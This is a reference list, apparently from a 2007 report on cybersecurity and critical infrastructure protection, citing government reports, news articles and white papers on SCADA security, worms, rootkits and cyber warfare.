National Strategy to Secure Cyberspace. Feb. 2003. US Government. <http://www.whitehouse.gov/pcipb/policy_and_principles.pdf>.

http://www.nitrd.gov/pitac/reports/20050301_cybersecurity/cybersecurity.pdf

NTIA: Critical Infrastructure Protection. Retrieved November 3, 2007, from NTIA Web site: http://www.ntia.doc.gov/ntiahome/infrastructure

"Pentagon Admits Security Breach but won't say who did it". NetworkWorld.com, 30 October, 2007. http://www.networkworld.com/community/node/19041

Purdue University. Virus Terminology. 2005. 1 Dec. 2005 <http://www.purdue.edu/securepurdue/steam/help/view.cfm?KBTopicID=210>.

Pethokoukis, James. (2007) "So How Goes Bin Laden's War on the U.S. Economy?" U.S. News & World Report. 27 Oct 2007. http://www.usnews.com/blogs/capital-commerce/2007/9/11/so-how-goes-bin-ladens-war-on-the-us-economy.html


Pike, J. (2007, July 7). Chronology of terrorist attacks against public transit. Retrieved October 30, 2007, from Global Security Web site: http://www.globalsecurity.org/security/ops/mass-transit-chron.htm

"Poll Shows Americans Want Congress to Do More to Protect Them Online." Cyber Security Industry Alliance (2006): 30. 21 Oct. 2007 <https://www.csialliance.org/news/pr/view?item_key=e5b543c0cf207bb110c9c65b61ac476ec45e03fe>.

"Poll: 50% of NYC Says U.S. Govt Knew." 30 Aug. 2004. Zogby International Polling/Market Research. 28 Oct. 2007 <http://www.911truth.org/article.php?story=20040830120349841>.

Poulsen, K. "Slammer worm crashed Ohio nuke plant network." Security Focus. 19 August 2003. 12 Sep. 2007. <http://www.securityfocus.com/news/6767>

"Privacy Impact Assessment EINSTEIN Program Collecting, Analyzing, and Sharing Computer Security Information Across the Federal Civilian Government." US-CERT. Sept. 2004. Department of Homeland Security. <http://www.dhs.gov/xlibrary/assets/privacy/privacy_pia_eisntein.pdf>.

Raymond, Eric. The on-line hacker Jargon File 4.4.7. 29 Dec 2003. 26 Nov 2007 http://www.catb.org/jargon/html/index.html

Reid, Tim (2007). "China's cyber army is preparing to march on America, says Pentagon". The Times. 30 October, 2007. http://technology.timesonline.co.uk/tol/news/tech_and_web/the_web/article2409865.ece

"Report Reveals Perception Gap in Cyber Security Awareness." Security Products 2 Oct. 2007. 20 Oct. 2007 <http://www.secprodonline.com/articles/50717/>.

Rootkits: The Growing Threat. 2006. McAfee Inc. 1 Nov 2007. http://download.nai.com/products/mcafee-avert/WhitePapers/AKapoor_Rootkits1.pdf

Rogin, Josh (2006). "DOD: China fielding cyberattack units". 30 October, 2007. http://www.fcw.com/online/news/94650-1.html

Ruggles, Steven. Historical Bush Approval Ratings. Dept. of Hist., U. of Minnesota. 2007. 27 Oct. 2007 <http://www.hist.umn.edu/~ruggles/Approval.htm>.

SCADA Security and Terrorism: We're Not Crying Wolf. Black Hat. 2006. 1-36. 15 Oct. 2007 <http://www.blackhat.com/presentations/bh-federal-06/BH-Fed-06-Maynor-Graham-up.pdf>.

Shainker, R. "Electric Utility Responses to Grid Issues." IEEE Power & Energy Magazine. March/April 2006: 31. 24 Oct. 2007 <http://www.lib.ncsu.edu:2178/iel5/8014/33609/01597993.pdf?tp=&arnumber=1597993&isnumber=33609>

Shane, Leo III (2007). "AF Taking Careers into Cyberspace". 30 October, 2007. http://www.military.com/features/0,15240,152400,00.html?wh=benefits

"Statement of General James E. Cartwright, Commander, United States Strategic Command, Before the House Armed Services Committee on United States Strategic Command, 21 March 2007". 30 October, 2007 <http://armedservices.house.gov/pdfs/FC032107/Cartwright_Testimony032007.pdf>

Szyliowicz, Joseph S. (2004). International transportation security. Review of Policy Research. 21


Thornburgh, Nathan (2005). "The Invasion of the Chinese Cyberspies (And the Man Who Tried to Stop Them)", Time. 30 October, 2007. <http://www.time.com/time/magazine/article/0,9171,1098961-1,00.html>

Thomas, Pierre (1998). Teen hacker faces federal charges. Retrieved October 25, 2007, from CNN.com Web site: http://www.cnn.com/TECH/computing/9803/18/juvenile.hacker/index.html

Transportation Research Board. (2003). Cybersecurity of freight information systems: A scoping study. Washington, D.C.: Transportation Research Board.

Traffic details for staysafeonline.info. Retrieved November 3, 2007, from Alexa: The Web Information Company Web site: http://alexa.com/data/details/traffic_details?url=staysafeonline.info

Understanding SCADA System Security Vulnerabilities. Riptech. 2001. 1-5. 23 Oct. 2007 <http://www.iwar.org.uk/cip/resources/utilities/SCADAWhitepaperfinal1.pdf>.

"United States Computer Emergency Readiness Team." Department of Homeland Security. US Government. <http://www.uscert.gov/>.

US-CERT. Home Computer Security - Examples. 2002. 1 Nov. 2005 <http://www.cert.org/homeusers/HomeComputerSecurity/examples.html>.

http://archives.cnn.com/2001/TECH/ptech/10/21/black.ice.idg/index.html Utah's 'Black Ice': Cyber-attack scenario. Verton, Dan. October 21, 2001.

Wald, M. L. Can Computers Foil Air Pirates? (2002, April 11). New York Times.

Wilson, Clay (2007). "CRS Report for Congress: Information Operations, Electronic Warfare, and Cyberwar: Capabilities and Related Policy Issues". 30 October, 2007. http://stinet.dtic.mil/cgi-bin/GetTRDoc?AD=ADA466599&Location=U2&doc=GetTRDoc.pdf?

http://query.nytimes.com/gst/fullpage.html?res=9F01E1DD1E39F933A05756C0A960958260&sec=&spon=&pagewanted=all Wren, Christopher S. May 30, 1996. The New York Times. Plot of Terror in the Skies Is Outlined by a Prosecutor.

http://www.wired.com/politics/law/news/2000/07/37503

"Wireless Vulnerabilities". Maisonbisson. 24 Sept 2002. 30 Oct 2007. <http://maisonbisson.com/blog/post/10387/wireless-vulnerabilities>

"What is SCADA?" The Tech-FAQ. 2007. 27 Oct. 2007 <http://www.tech-faq.com/scada.shtml>.

Wood, Anthony & Stankovic, John. Denial of Service in Sensor Networks. IEEE Computer. Oct 2002. 54–62.

Yeh, Y.C. (2001). Safety critical avionics for the 777 primary flight controls system. Digital Avionics Systems. 1, 1-11.